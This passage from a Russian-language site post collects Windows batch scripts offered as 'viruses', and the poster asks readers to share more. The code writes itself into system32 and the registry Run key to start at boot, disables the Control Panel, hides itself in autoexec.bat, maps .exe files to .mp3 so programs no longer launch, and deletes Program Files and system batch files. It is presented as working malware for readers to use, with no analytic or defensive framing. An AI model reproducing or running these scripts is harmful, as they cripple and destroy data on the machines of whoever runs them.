echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end[/SRC]

Добавляет программу в автозагрузку ОС

[SRC]copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
[/SRC]


Этот вирус,блокирует все программы,но интернет работает.

[SRC]Echo_inactive_inactive off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD[/SRC]

Если вы знаете еще какие-то батники то пишите в эту тему.

Категория: Советы и Рекомендации | Добавил: Ufo-Aliens (13.09.2024)
Просмотров: 123 | Рейтинг: 0.0/0
Всего комментариев: 0
Войдите:
avatar